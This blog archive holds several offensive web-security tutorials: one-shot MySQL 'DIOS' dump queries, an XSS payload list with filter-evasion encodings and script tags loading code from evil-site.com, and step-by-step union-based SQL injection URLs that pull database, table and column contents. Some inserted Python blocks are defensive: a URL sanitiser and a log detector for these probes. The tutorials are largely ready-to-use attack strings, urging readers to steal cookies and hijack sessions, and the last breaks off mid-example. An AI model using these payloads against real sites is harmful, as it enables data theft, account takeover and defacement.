Thursday, 5 March 2015

DIOS (Dump in One Shot) Explained By Security Idiots & Zenodermus Javanicus

Starting on the name of My god "Allah" the most beneficent the most merciful

I don't know if there is an explanation of DIOS already, or whether it is explained in a better way than the way I am going to explain it, but I know many injectors are searching for it, and I am getting many requests to write an explanation of DIOS. So let's start understanding DIOS and how it actually works. We will first make it easy and small, then move step by step to complex ones. To understand DIOS you have to read the tutorial at least twice with full concentration. If you think you will just glance through it step by step and understand it easily, then you are wrong and in the wrong place. So if you really want to understand it, read it carefully.

Here is a basic query which gives us all the databases:

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>'))))a)

The above query returns all the databases in one shot. So let us try to understand how it actually works; for that we first have to understand the innermost part of the query (the subquery on information_schema.schemata). But before that we have to understand the use of the IN clause in a SQL statement.

select * from tablename where name in ('inj3ct0r','Zenodermus','Security','Idiots')

The above statement extracts all the records from the table where the name value is either 'inj3ct0r' or 'Zenodermus' or 'Security' or 'Idiots'; it can also be written another way, using OR, as given below.

select * from tablename where name='inj3ct0r' or name='Zenodermus' or name='Security' or name='Idiots';

Output for both statements will be the same. So now let's move back to DIOS, where we can see the innermost statement, which is:
(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'<br>')))

What is happening here is that we select a variable @a from information_schema.schemata, and in the IN clause we concatenate every schema name onto it. The assignment @a:=concat(@a,schema_name,'<br>') is evaluated for each row before the comparison, so @a is compared with its own freshly assigned value; the condition is therefore true for every row of information_schema.schemata, and each row appends "schema_name,'<br>'" to @a. In other words, @a is concatenated with itself in a loop over the rows. Now let's see the rest of the query.

(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in ((@a:=concat(@a,schema_name,'<br>'))))a)

Now I guess you can understand that we are selecting that concatenated variable @a in the outer statement. Now let's move to our next query, which gives us all the table names in one shot. One more thing: the reason we use this query is that group_concat does not return more than 1024 characters by default (the group_concat_max_len setting), so we cannot extract much data with it. There are some other bypasses for the 1024-character limitation, which are discussed over here at Death Row Injection.
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where (@a)in (@a:=concat(@a,table_name,'<br>'))))a)

The above query gives us all the table names in the same manner we got the database names, but this time we need to add a condition to remove all the tables which belong to information_schema; below is the query for that.
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_name,'<br>'))))a)

Now the query gives us all the table names, excluding the tables from information_schema. But there is still a problem: we cannot see which table belongs to which database, so we can also include table_schema each time while concatenating.
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,0x3a,table_name,'<br>'))))a)

Now we have all the database names and the table names, but we have a better option: get all the database names, table names and column names together by using the information_schema.columns table.
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

Now let's take a common challenge which gets posted: extract all the table names which start with 'shit_'. In that case we can add another condition, as the query below shows.
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.columns)where table_schema!='information_schema' and table_name like 'shit_%' and(@a)in (@a:=concat(@a,table_schema,' > ',table_name,' > ',column_name,'<br>'))))a)

In this manner we can get whatever output we want from DIOS. Some more complicated queries will be discussed in the next part of the DIOS explanation.
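To make the row-by-row evaluation concrete, here is an added Python model of the accumulator that every query in this post relies on. It is not code from the post and it does not talk to MySQL; it replays, for a constructed list of schema and column rows, what the server does on each row: the other WHERE conditions, the assignment inside IN(), and the membership test that can never fail. The names accumulate, dios_schemata and dios_columns and the SAMPLE_* data are all made up for the example.

```python
"""Model of the MySQL user-variable accumulator used by the DIOS queries above.

Added example, not code from the post; it replays the per-row evaluation of

    where <other conditions> and (@a) in (@a := concat(@a, <text>))

in plain Python instead of MySQL. Sample rows are constructed.
"""
from typing import Callable, Iterable, Tuple

# Constructed stand-ins for information_schema.schemata and .columns rows.
SAMPLE_SCHEMATA = [("information_schema",), ("mysql",), ("appdb",)]
SAMPLE_COLUMNS = [  # (table_schema, table_name, column_name)
    ("information_schema", "SCHEMATA", "SCHEMA_NAME"),
    ("mysql", "user", "Host"),
    ("appdb", "shit_users", "id"),
    ("appdb", "shit_users", "email"),
    ("appdb", "orders", "id"),
]


def accumulate(rows: Iterable[Tuple[str, ...]],
               render: Callable[[Tuple[str, ...]], str],
               keep: Callable[[Tuple[str, ...]], bool] = lambda row: True) -> str:
    """Return the final value of @a after scanning `rows`.

    MySQL evaluates the WHERE clause once per row, left to right:
      1. `keep(row)` stands for conditions such as
         table_schema!='information_schema'; when false the rest is skipped.
      2. The assignment inside IN() runs before the comparison, so @a already
         holds the new value when `(@a) in (...)` is tested.
      3. The membership test is therefore always true, every surviving row is
         "selected", and the only lasting effect is the growth of @a.
    The outer `select (@a) from (...)` reads the finished string once.
    """
    a = ""  # select(@a:=0x00) seeds the variable
    for row in rows:
        if not keep(row):
            continue
        new_value = a + render(row)          # @a := concat(@a, ...)
        a = new_value
        if a not in (new_value,):            # the IN() test; never taken
            raise AssertionError("cannot happen: @a is compared with itself")
    return a


def dios_schemata() -> str:
    """The first query in the post: every schema name, '<br>'-separated."""
    return accumulate(SAMPLE_SCHEMATA, lambda r: r[0] + "<br>")


def dios_columns(exclude_schema: str = "information_schema",
                 table_prefix: str = "") -> str:
    """The information_schema.columns variant with the post's two filters.

    MySQL's `table_name like 'prefix%'` is modelled with startswith(); note that
    in LIKE an underscore is a one-character wildcard, so 'shit_%' also matches
    names such as 'shitXfoo', which this model does not reproduce.
    """
    return accumulate(
        SAMPLE_COLUMNS,
        lambda r: f"{r[0]} > {r[1]} > {r[2]}<br>",
        keep=lambda r: r[0] != exclude_schema and r[1].startswith(table_prefix),
    )


if __name__ == "__main__":
    print(dios_schemata())
    print(dios_columns(table_prefix="shit_"))
```

The model also shows why the post prefers this construct to group_concat: nothing in the loop is subject to group_concat_max_len, and the only cap on the growing string is the general max_allowed_packet bound on string-function results, which is why a single response can carry the whole listing and why response sizes for one request jumping by kilobytes are a useful thing to alert on.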

 Author : Zenodermus Javanicus

Wednesday, 4 March 2015

Cross Site Scripting (XSS) Tutorial By Unknown

Cross Site Scripting (XSS) Tutorial 


Simply put, cross site scripting involves the injection of malicious code into a website. It is the most common method of attack at the moment, as most large sites will contain at least one XSS vulnerability. However, there is more than one type of XSS. The most commonly found is referred to as "non-persistent" XSS.
Non-persistent XSS

Non-persistent, as the title suggests, means that the injected script isn't permanent and just appears for the short time the user is viewing the page. The best example of this is a basic search script for a site. Say, for example, the site search script takes this form:

Site.com/search.php?search=text here



Once something has been searched for, the script may display on the page something along the lines of:

"Results for text here"

It simply echoes your search string straight onto the page without performing any validation checks. What if we were to alter the search string to HTML or JavaScript? For example:

Site.com/search.php?search=<font color=red>XSS</font>


Site.com/search.php?search=<script>alert("XSS");</script>


If no sanitisation checks are being performed by the search script, this will just be echoed straight onto the page, displaying red text or an alert. If there is no size limit, this could be used to display anything you want.

However, since the attacker can only display code on the pages they themselves load, this isn't much of a threat to other users on its own. Although if the string is turned into hex the search string may be slightly more hidden, and with a little deception it could be used to trick users into thinking the link is legitimate.

Next there's persistent XSS


Persistent XSS



Again, as the name suggests, this is the type of XSS attack the attacker would want to get. Persistent attacks are injected permanently into the code of the site, so anyone who views the site will see them every time. In order for these to work, the code has to be stored on the site's server somehow, and such a place can be hard to find.

An embarrassing example of this was an XSS vulnerability discovered on this site by one of our users (fixed now, obviously) affecting the page all.php. The registration process wasn't sanitised at all, so all a user had to do was register with a username containing HTML or JavaScript code. This was an obvious vulnerability which should have been spotted from the beginning, but just like XSS on other sites it was missed. If not fixed, this vulnerability would have affected all.php as well as the forums and anywhere else the username was displayed on the site. A good place to look out for this vulnerability is basic forum scripts that site owners have made themselves or found on sites designed to help novices.

With both of these attacks, it is also possible to run malicious code from another site, again making the possibilities of attack endless. JavaScript has a lot of features that are not well known, such as changing the images on sites via images[number].src, and anyone who uses MySpace will know that CSS can be used to remove or replace certain sections of a site based on name. If you have a permanently vulnerable site, injecting code as simple as the one below will allow you to run XSS off another site:

<SCRIPT SRC=http://evil-site.com/xss.js> </SCRIPT>


Getting Past Basic Protection 



So what if a site owner knows about XSS, but has provided some, but very little, protection against it? Well, this is where CharCode comes in. CharCode is basically just a simple form of character encoding that can encode blocked characters so they get past the protection but are still displayed normally on the page. Here is a very common one that will pop up alerts saying "XSS" if the page is vulnerable:


';alert(String.fromCharCode(88,83,83))//\'; alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\"; alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT> alert(String.fromCharCode(88,83,83))</SCRIPT>


This is a very useful XSS to know, as it provides more than one type of attack at once. If you get only one or two alerts, you know that only one or two of them work, so you need to eliminate some of them to test which one is affecting the site. The CharCode for "X" is 88 and for "S" is 83. As you can see, each provides a slight variation to try to beat character blocking.

XSS could also be hidden in a non-existent image. The code below would run malicious JavaScript disguised as an image:

<img src="javascript:alert('XSS');">


What if quotes are blocked? No problem, just inject the site like so: 


<img src=javascript:alert(&quot;XSS&quot;)>


The &quot; will be interpreted in HTML as a " so the code will run fine. The next one below is very likely to work if you find a site is vulnerable.

<img src=javascript:alert(String.fromCharCode(88,83,83))>


The XSS is hidden in image form and CharCode is being used to display the XSS vulnerability.

Now things get slightly more complicated as we enter ASCII and Unicode. Unicode is just a basic code that was invented to allow all characters to be available to everyone, e.g. for different languages such as Chinese character symbols, and ASCII has a similar purpose. You can go to http://www.asciitable.com to view the HTML code needed for each ASCII character. The example below shows the whole code in ASCII form (decimal HTML character references):

<img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


As you can tell, this will beat many filters, as the code is basically unrecognisable. However, decoding it reveals what it was designed to do. Next for Unicode; again this makes the text unrecognisable but works the same:

<img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>


If the site allows only a limited number of characters, this probably won't be useful. As mentioned previously, hex can also be used for XSS. The example below shows this:

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>


Again unrecognisable which makes it a great XSS to use.

The list of possible XSS attacks is endless and far more than is covered here. With so many ways to bypass security checks, site owners have to work harder to protect their sites. Since web forms are used on most sites these days, allowing users to enter code which will be stored somewhere and inevitably viewed by someone else, XSS can be used for almost anything: with practice, XSS can be used to run a hidden cookie stealer, which a user will view and which will allow you to steal their login info; or, if sessions are used, to perform "session hijacking", where you steal their session data and again log in as them; or for the simple defacement of a website through HTML or JavaScript. XSS is definitely an attack method which should be studied well, as it provides such a common method of attack.

As mentioned above, the list of possible XSS attacks is endless and there isn't enough room to mention them all here, but I will finish with some more XSS examples that may affect a vulnerable site.

<IMG SRC="jav&#x0A;ascript:alert('XSS');"> - new line vulnerability

<iframe src=http://evil-site.com/evil.html < - XSS using an iframe to display a whole new page

<SCRIPT>x=/XSS/  alert(x.source)</SCRIPT> - again beat checks using Javascript



<BODY BACKGROUND="javascript:alert('XSS')"> - infected body tag

<BGSOUND SRC="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> - stylesheet vulnerability

<IMG SRC='vbscript:msgbox("XSS")'> - vbscript, scripting language similar to javascript, again can help beat validation checks

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> - incorrectly parsed meta refresh

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> - base64, another form of encoding; this one is less likely to work.

<SCRIPT SRC="http://evil-site.com/xss.jpg"></SCRIPT> - very sneaky method: here you rename your .js to .jpg, but since you have the script tags it will still be read as a JS file.



The list goes on and on; the best way is to just try them yourself. A lot of the time incorrectly written HTML code will be the best method. If one way doesn't work, try adding an extra ">" or "<" to the start or end of the code, for example, or view the source of the page for tags you need to close, adding a "'>" to the end and then starting your own malicious code. Well, that's the end of this tutorial. For more XSS attack examples just use Google, as more of these are being thought up every day. Soon you should even be able to invent your own.
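The tutorial above exercises two sinks: a search term echoed straight into the page, and URLs placed in attributes such as img src, where the numeric, zero-padded, hex and newline-split spellings of "javascript:" are all decoded by the browser before the URL is interpreted. The following is an added example, not code from the tutorial, showing the defence for each in Python: HTML-escaping the reflected term, and vetting an attribute URL by undoing the same decoding the browser performs and then allowing only http(s). The function names render_search_results, normalise_url and is_safe_url are invented for the example; the TUTORIAL_SRC_VALUES list reproduces attribute values from the tutorial's own examples.

```python
"""Defences for the two sinks this tutorial exercises.

Added example, not code from the tutorial. Part 1 escapes a reflected search
term before it is echoed (the search.php case). Part 2 vets a URL destined
for an attribute such as img src by decoding HTML character references,
dropping whitespace and control characters, and allowing only http(s), so
the numeric, hex, zero-padded and newline-split "javascript:" forms above are
all rejected. The sample values below are copied from the tutorial's list.
"""
import html
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Attribute values taken from the tutorial above, constructed here as strings.
TUTORIAL_SRC_VALUES = [
    "javascript:alert('XSS');",
    "javascript:alert(&quot;XSS&quot;)",
    "&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; "
    "&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;",
    "&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 "
    "&#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 "
    "&#0000083&#0000083&#0000039&#0000041",
    "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 "
    "&#x58&#x53&#x53&#x27&#x29",
    "jav&#x0A;ascript:alert('XSS');",
    'vbscript:msgbox("XSS")',
    "data:text/html; base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K",
]


def render_search_results(term: str) -> str:
    """Echo the search term the way search.php should: HTML-escaped."""
    return 'Results for "%s"' % html.escape(term, quote=True)


def normalise_url(raw: str) -> str:
    """Undo what a browser undoes before it interprets an attribute URL."""
    decoded = html.unescape(raw)                 # &#106; &#x6A &quot; ... -> characters
    return "".join(ch for ch in decoded          # browsers ignore these in the scheme
                   if not ch.isspace() and ch.isprintable())


def is_safe_url(raw: str) -> bool:
    """True only for http(s) URLs or same-origin relative paths."""
    cleaned = normalise_url(raw)
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme == "":
        return not cleaned.startswith("//")      # no protocol-relative URLs
    return scheme in ALLOWED_SCHEMES


def rejected_tutorial_values() -> int:
    """How many of the tutorial's attribute payloads the check refuses."""
    return sum(1 for v in TUTORIAL_SRC_VALUES if not is_safe_url(v))


if __name__ == "__main__":
    print(render_search_results('<script>alert("XSS");</script>'))
    for v in TUTORIAL_SRC_VALUES:
        print(f"{is_safe_url(v)!s:5}  {normalise_url(v)}")
```

The important design point is the order of operations: the check must run on the value as the browser will see it, so character references are decoded and whitespace is stripped first, and the decision is an allowlist of schemes rather than a blocklist of spellings of "javascript". Escaping for the page body and validating a URL are different operations because the contexts differ; html.escape alone would not stop a javascript: URL, and the URL check alone would not stop a <script> tag in body text.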

Basic Union Based Injection By Security Idiots & Zenodermus Javanicus

Welcome to the third part of SQL Injection. In this tutorial we will learn how to inject Union based injection.

In our last tutorial we learnt how to find out the number of columns used in the query so that we can use a union select statement. So we will continue with the same URL and the same injection we were injecting. In the last tutorial we found that the vulnerable URL has 5 columns and the query below was working.

http://fakesite.com/report.php?id=23 order by 5--+


Now we will use Union select statement over here.

http://fakesite.com/report.php?id=23 union select 1,2,3,4,5--+


What it does is append one more row to the output, which will look like this:

column1  column2  column3  column4  column5
anydata  anydata  anydata  anydata  anydata
1        2        3        4        5


Here a little understanding of the web application is required. If you see any of these numbers printed in the webpage, the title or anywhere else, then you know the developer is printing multiple rows. But in case you cannot see any of these numbers printed, you can simply invalidate the first query so that it won't give any output, and eventually your output becomes the one and only output to be printed.

http://fakesite.com/report.php?id=23 and 0 union select 1,2,3,4,5--+

http://fakesite.com/report.php?id=23 and false union select 1,2,3,4,5--+

http://fakesite.com/report.php?id=-23 union select 1,2,3,4,5--+

http://fakesite.com/report.php?id=23000000 union select 1,2,3,4,5--+

http://fakesite.com/report.php?id=null union select 1,2,3,4,5--+

http://fakesite.com/report.php?id=23 && 0 union select 1,2,3,4,5--+



Above I have specified some ways to make a query invalid, but remember that & should be URL-encoded before use. Now when we use any of the above queries, one row will come in the output.

column1  column2  column3  column4  column5
1        2        3        4        5


One of the numbers must be printed in the webpage. Again, the basic thing to understand is that the programmer may be printing only some particular columns from the output, let's say the third one. So if we can see 3 in the page then it's good; otherwise we can try the query below with some other values.

http://fakesite.com/report.php?id=-23 union select 'hello1','hello2','hello3','hello4','hello5'--+



Now just try to find it inside the source code. If you find hello1 that means the first column is getting printed, if you find hello2 then the second column is getting printed, and so on. Still, sometimes if the programmer is using mysql_real_escape_string it may create an error or else no output. We can simply avoid the usage of single quotes by using hex values. Below is the encoded form of the same query.

http://fakesite.com/report.php?id=-23 union select 0x68656c6c6f31,0x68656c6c6f32,0x68656c6c6f33,0x68656c6c6f34,0x68656c6c6f35--+


One small thing to remember is to always add 0x before any hexadecimal value. Hopefully the above query will work and you will find the column which is getting printed on the webpage or inside the source code. We will stick with the 3rd column for this example, as we know that anything in place of the third column gets printed. Now we can try some default functions and variables to get some information related to our target. Below are some of the variables/functions that can be used to get information about the target machine.

Variable/Function : Output
@@hostname : Current hostname
@@tmpdir : Temp directory
@@datadir : Data directory
@@version : Version of DB
@@basedir : Base directory
user() : Current user
database() : Current database
version() : Version
schema() : Current database
UUID() : System UUID key
current_user() : Current user
current_user : Current user
system_user() : Current system user
session_user() : Session user
@@GLOBAL.have_symlink : Check if symlink is enabled or disabled
@@GLOBAL.have_ssl : Check if it has SSL or not


As we know that the third column is the one getting printed, we will use the above functions in place of that column only.

To get the Current Database Name
http://fakesite.com/report.php?id=-23 union select 1,2,database(),4,5--+

To get the Current Version
http://fakesite.com/report.php?id=-23 union select 1,2,version(),4,5--+

To get the Current User
http://fakesite.com/report.php?id=-23 union select 1,2,user(),4,5--+

To get the Temporary Directory Path
http://fakesite.com/report.php?id=-23 union select 1,2,@@tmpdir,4,5--+


Now we will move to our next part, which is Data Extraction.

Data Extraction using SQLi


There are many ways to extract data using SQLi; the first one is union based. First I will show you the queries and then how we can inject them.

Query : Select schema_name from information_schema.schemata

Injection : http://fakesite.com/report.php?id=-23 union select 1,2,schema_name,4,5 from information_schema.schemata--+


This will give us the names of all the databases available. But as we found earlier, sometimes the programmer may not be printing all the rows; he may be printing only the first row of the output. So in that case we can use the limit keyword to enumerate the rows one by one.

First row
Select schema_name from information_schema.schemata limit 0,1--+

Second row
Select schema_name from information_schema.schemata limit 1,1--+

Third row
Select schema_name from information_schema.schemata limit 2,1--+

Fourth row
Select schema_name from information_schema.schemata limit 3,1--+

and so on...


In the above manner we can get each row one by one. Now let's see how we can extract all the table names from a database.

Query : Select table_name from information_schema.tables where table_schema='databasename'

Query for Current DB: Select table_name from information_schema.tables where table_schema=database()

Injection : http://fakesite.com/report.php?id=-23 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=database()--+


Above injection will give you all the rows at once, but if you want one by one then you can use limit.

First row
http://fakesite.com/report.php?id=-23 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=database() limit 0,1--+

Second row
http://fakesite.com/report.php?id=-23 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=database() limit 1,1--+

Third row
http://fakesite.com/report.php?id=-23 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=database() limit 2,1--+

Fourth row
http://fakesite.com/report.php?id=-23 union select 1,2,table_name,4,5 from information_schema.tables where table_schema=database() limit 3,1--+

and so on...


After getting the table names we can move on and start collecting the names of the columns in any table; we can specify the table name as we have all the table names.

Query : Select column_name from information_schema.columns where table_schema=database() and table_name='tablenamehere'

Injection : http://fakesite.com/report.php?id=-23 union Select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name='tablenamehere'--+


If the above query does not give any output, or gives an error, you can try hexing the table name. And now we can get all the column names one by one if only one row is getting printed.

First row
http://fakesite.com/report.php?id=-23 union select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name='tablename' limit 0,1--+

Second row
http://fakesite.com/report.php?id=-23 union select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name='tablename' limit 1,1--+

Third row
http://fakesite.com/report.php?id=-23 union select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name='tablename' limit 2,1--+

Fourth row
http://fakesite.com/report.php?id=-23 union select 1,2,column_name,4,5 from information_schema.columns where table_schema=database() and table_name='tablename' limit 3,1--+

and so on...


Now we know the database name, the table names and the column names, so the last stage starts: extracting data from the columns. Now we have to specify from which column we want the data and from which table. The query and injection are simple at this stage.

Query : Select column1, column2 from tablename

First row : http://fakesite.com/report.php?id=-23 union Select 1,2,concat(column1,column2),4,5 from tablename limit 0,1--+

Second row : http://fakesite.com/report.php?id=-23 union Select 1,2,concat(column1,column2),4,5 from tablename limit 1,1--+

Third row : http://fakesite.com/report.php?id=-23 union Select 1,2,concat(column1,column2),4,5 from tablename limit 2,1--+

Fourth row : http://fakesite.com/report.php?id=-23 union Select 1,2,concat(column1,column2),4,5 from tablename limit 3,1--+



That's all for Basic Union Based Injection.
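Every request shape in this post, and the DIOS accumulator from the post above it, leaves a recognisable trace in the web server's access log. The following is an added example, not code from either post, of a small detector in Python that URL-decodes each query parameter of a combined-format log line and applies a few rules (union select, order-by column counting, information_schema references, the @var:=concat() accumulator, a trailing comment). The log lines are constructed for the example and reproduce the probes from these posts, plus one benign search that happens to contain the word "union"; the rule names and the functions analyse_line and analyse_log are invented here.

```python
"""Spot union-based and DIOS-style SQL injection probes in web server logs.

Added example, not code from the posts above. The log lines are constructed
(combined log format) and their request paths mirror the probe shapes the
tutorials walk through: order-by column counting, union select with
information_schema, a user-variable accumulator, and a trailing comment.
The last line is a benign search containing the word "union".
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

SAMPLE_LOG = """\
203.0.113.7 - - [04/Mar/2015:10:01:02 +0000] "GET /report.php?id=23 HTTP/1.1" 200 1532
203.0.113.7 - - [04/Mar/2015:10:01:09 +0000] "GET /report.php?id=23%20order%20by%2010--+ HTTP/1.1" 500 221
203.0.113.7 - - [04/Mar/2015:10:01:15 +0000] "GET /report.php?id=-23%20union%20select%201,2,version(),4,5--+ HTTP/1.1" 200 1540
203.0.113.7 - - [04/Mar/2015:10:02:40 +0000] "GET /report.php?id=-23%20union%20select%201,2,(select%20(@a)%20from%20(select(@a:=0x00),(select%20(@a)%20from%20(information_schema.columns)where%20(@a)in%20(@a:=concat(@a,table_name,'<br>'))))a),4,5--+ HTTP/1.1" 200 9874
198.51.100.9 - - [04/Mar/2015:10:03:01 +0000] "GET /search.php?q=union+station+timetable HTTP/1.1" 200 880
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')

# Each rule is applied to a URL-decoded, lower-cased parameter value.
RULES = [
    ("union-select", re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b")),
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+\b")),
    ("information_schema", re.compile(r"\binformation_schema\.")),
    ("dios-accumulator", re.compile(r"@\w+\s*:=\s*concat\(")),
    ("comment-terminator", re.compile(r"(--|#)\s*$")),
]


def decode_value(value: str) -> str:
    """parse_qsl already decoded once; decode again to catch double-encoding."""
    return unquote_plus(value).lower()


def analyse_line(line: str) -> list:
    """Return the sorted rule names that match any query parameter of the line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    query = urlsplit(match.group("target")).query
    hits = set()
    for _name, value in parse_qsl(query, keep_blank_values=True):
        text = decode_value(value)
        hits.update(rule for rule, pattern in RULES if pattern.search(text))
    return sorted(hits)


def analyse_log(log: str) -> list:
    """(1-based line number, hits) for every line that triggers a rule."""
    flagged = []
    for number, line in enumerate(log.splitlines(), start=1):
        hits = analyse_line(line)
        if hits:
            flagged.append((number, hits))
    return flagged


if __name__ == "__main__":
    for number, hits in analyse_log(SAMPLE_LOG):
        print(number, ", ".join(hits))
```

Matching runs on the decoded value rather than the raw request line so that %20, + and double-encoded payloads all land in the same normal form, and the benign "union station" search shows why the union rule insists on a following select. In practice the interesting signal is the sequence: a 500 on an order-by probe followed by 200s with growing response sizes from the same client is the column-counting walk this post describes.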

 Author : Zenodermus Javanicus & Security Idiots

Tuesday, 3 March 2015

Basic of SQL for SQL Injection part 3

Welcome to the third part of basics of SQL for SQL injection. In the last part we took this URL "http://fakesite.com/report.php?id=23" as an example, assumed some basic queries by looking at the URL, then tried different injections and learnt how to figure out which type of query we are facing. In this tutorial we will learn how to understand which comment type we should use and why, and how to find the number of columns.

As discussed earlier following are the different types of comments used in SQLi.

Comment : Name
-- : MySQL Linux style
--+ : MySQL Windows style
# : Hash (URL-encode when used)
--+- : SQL comment
; : Null byte
` : Backtick


Well, actually it only depends on the environment and the reaction of the application when we try some commenting operators. If you see PHP is used then usually "--" will surely work; otherwise you can check "--+" or "#" (URL-encoded), else the best option is to try the different types of comments and analyse the output. So what we will do to check is try to close our input with all possibilities, like single quote, double quote or brackets etc., and comment out the rest of the query; if it works then we can be sure that this comment is working. We will again take the same URL for example, "http://fakesite.com/report.php?id=23", so let's see how we can check which comment to use.

Injection : If it gives the same output as 23 was giving, then
http://fakesite.com/report.php?id=23-- : It's an integer type injection and '--' can be used as comment
http://fakesite.com/report.php?id=23'-- : It's a single quote type injection and '--' can be used as comment
http://fakesite.com/report.php?id=23"-- : It's a double quote type injection and '--' can be used as comment
http://fakesite.com/report.php?id=23)-- : It's an integer type with bracket injection and '--' can be used as comment
http://fakesite.com/report.php?id=23')-- : It's a single quote with bracket type injection and '--' can be used as comment
http://fakesite.com/report.php?id=23")-- : It's a double quote with bracket type injection and '--' can be used as comment


So as I showed above for the '--' type comment, in the same manner you can check all commenting types, and the one which gives the same output as "http://fakesite.com/report.php?id=23" tells you the type of internal query along with the comment that you can use.

Now that we have understood how to figure out the internal query and then find the type of comment we can use, let's start with the basics of injecting.

Any time, anywhere, in any application, wherever and whenever you are injecting, there are the following three basic rules of injecting:

[1]. Balance.
[2]. Inject.
[3]. Commenting.

Understanding the first phase "Balance":

In this phase we balance the internal query. For example, after reading Part 1 and Part 2 we understand how to assume and figure out the internal query used by the application where our input is injected. Let's say we figured out that our internal query is "Select * from tablename where id=('23')"; in this case our balancing input should be 23').

The phase of Injection:

In this phase we inject as per our requirement, and the type of injection we are doing.

The phase of Commenting:

Then the last part, commenting, which we already know. Now check the image below, which shows all three parts of the injection.


As per the Above Injection we can assume the internal query to be:

Select * from tablename where id='<input>'
So when we pass the URL "http://fakesite.com/report.php?id=23' order by 1--+" it will be injected in place of <input> in the above query and become:
Select * from tablename where id='23' order by 1--+'


So now let's start with our next phase; in this phase we will learn why and how to find the number of columns. First let's understand why we need to find the number of columns. Again, let's start from the basics with our example database:


Select f_name,l_name from students where id=1


Output will be:

f_name  l_name
Emily   watson


Now let's see how we can manipulate the output using a union statement. Union is used to add the output of multiple queries together. For example, below is a simple union query.

Select f_name,l_name from students where id=1 union select f_name,l_name from students where id=2


Output will be:

f_name  l_name
Emily   watson
Deniel  Robertson


So what the union query did here is concatenate the output of two different select queries. But one thing to remember while concatenating: union will only concatenate if both queries output the same number of columns. Let's try some more.
Select f_name,l_name from students where id=1 union select 1,2


Output will be:

f_name  l_name
Emily   watson
1       2


Select f_name,l_name from students where id=1 union select 'hello','bye'


Output will be:

f_name  l_name
Emily   watson
hello   bye


Select f_name,l_name from students where id=1 union select 5545,2323


Output will be:

f_name  l_name
Emily   watson
5545    2323


Select f_name,l_name from students where id=1 union select database(),user()


Output will be:

f_name   l_name
Emily    watson
fakedb1  fakeuser@localhost


Select * from students where id=1 union select f_name,l_name from students where id=2


For the above one there won't be any output, only the error "The used SELECT statements have a different number of columns", because "select * from students" selects all the columns from the table students, which are four; that is why when we tried to union 2 columns with it, we got an error. Union select is used to concatenate our injected output with the real output. Here we face a problem: we must know the number of columns the select query is using so that we can make the right union select statement. Here enters the "order by" keyword. Order by is used to sort the output of a query; let's see some examples.

Query : Output
select * from students order by 1 : It will output all the rows and sort them by the first column, which is id
select * from students order by 2 : It will output all the rows and sort them by the second column, which is f_name
select * from students order by 3 : It will output all the rows and sort them by the third column, which is l_name
select * from students order by 4 : It will output all the rows and sort them by the fourth column, which is roll_no
select * from students order by 5 : It will create an error "Unknown column '5' in 'order clause'"
select f_name,l_name from students order by 1 : It will output all the rows and sort them by the first column, which is f_name
select f_name,l_name from students order by 2 : It will output all the rows and sort them by the second column, which is l_name
select f_name,l_name from students order by 3 : It will create an error "Unknown column '3' in 'order clause'"


So we have seen above that if we try to sort our output by a number which is more than our column count then it will create an error. So we can easily understand that we can use order by to find how many columns we have inside the query.

Now again lets take an example URL "http://fakesite.com/report.php?id=23" and start injecting it from starting:

[#] Testing

Query : Output
http://fakesite.com/report.php?id=23 : Simple output from the web application
